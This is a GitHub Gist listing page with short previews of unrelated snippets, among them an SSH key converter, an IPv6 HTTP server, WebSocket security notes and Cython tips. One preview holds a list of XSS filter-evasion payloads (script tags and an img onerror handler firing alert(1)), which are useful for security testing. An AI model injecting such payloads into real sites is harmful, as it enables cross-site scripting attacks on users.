Skip to content

Instantly share code, notes, and snippets.

@thwarted
thwarted / sshpub-to-rsa
Created June 14, 2011 09:12
converts an openssh RSA public key into a format usable by openssl rsautl (if you don't have openssh 5.6 or later with ssh-keygen PEM export format)
#!/usr/bin/env python
# with help and inspiration from
# * ASN1_generate_nconf(3) (specifically the SubjectPublicKeyInfo structure)
# * http://www.sysmic.org/dotclear/index.php?post/2010/03/24/Convert-keys-betweens-GnuPG%2C-OpenSsh-and-OpenSSL
# * http://blog.oddbit.com/2011/05/converting-openssh-public-keys.html
import sys
import base64
import struct
@yosemitebandit
yosemitebandit / openpyxl-install-with-pip
Created June 4, 2012 17:42
reading xlsx files in python with openpyxl
$ pip install -E ~/conf/virtualenvs/xyuml https://bitbucket.org/ericgazoni/openpyxl/get/1.5.8.zip
@ibeex
ibeex / foo.log
Created August 4, 2012 13:46
Flask logging example
A warning occurred (42 apples)
An error occurred
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@blahgeek
blahgeek / isatap.fish
Created September 17, 2013 10:43
ISATAP config for Mac OS X. Works either with or without NAT. (fish script)
#!/usr/loca/bin/fish
function isatap
set REMOTE_IP 166.111.21.1
set LINK_PREFIX "fe80::200:5efe"
set GLOBAL_PREFIX "2402:f000:1:1501:200:5efe"
if sudo ifconfig gif0 destroy
echo "Previous gif0 destroyed"
end
@akorobov
akorobov / ipv6-httpd.py
Created December 11, 2013 00:58
quick ipv6 http server using python's SimpleHttpServer
import socket
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class MyHandler(SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/ip':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
@subudeepak
subudeepak / WebSockets.md
Last active May 31, 2024 09:36
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)

WebSockets - An Introduction

WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions

  • The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
  • This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
  • This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
@Liryna
Liryna / ARMDebianUbuntu.md
Last active October 13, 2024 16:16
Emulating ARM on Debian/Ubuntu

You might want to read this to get an introduction to armel vs armhf.

If the below is too much, you can try Ubuntu-ARMv7-Qemu but note it contains non-free blobs.

Running ARM programs under linux (without starting QEMU VM!)

First, cross-compile user programs with GCC-ARM toolchain. Then install qemu-arm-static so that you can run ARM executables directly on linux

@adriaandens
adriaandens / xss-game.md
Created May 31, 2014 18:59
xss-game by Google

XSS-game by Google

Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!

At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.

In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

There will be cake at the end of the test.

@ctokheim
ctokheim / cython_tricks.md
Last active March 4, 2024 23:27
cython tricks

Cython

Cython has two major benefits:

  1. Making python code faster, particularly things that can't be done in scipy/numpy
  2. Wrapping/interfacing with C/C++ code

Cython gains most of it's benefit from statically typing arguments. However, statically typing is not required, in fact, regular python code is valid cython (but don't expect much of a speed up). By incrementally adding more type information, the code can speed up by several factors. This gist just provides a very basic usage of cython.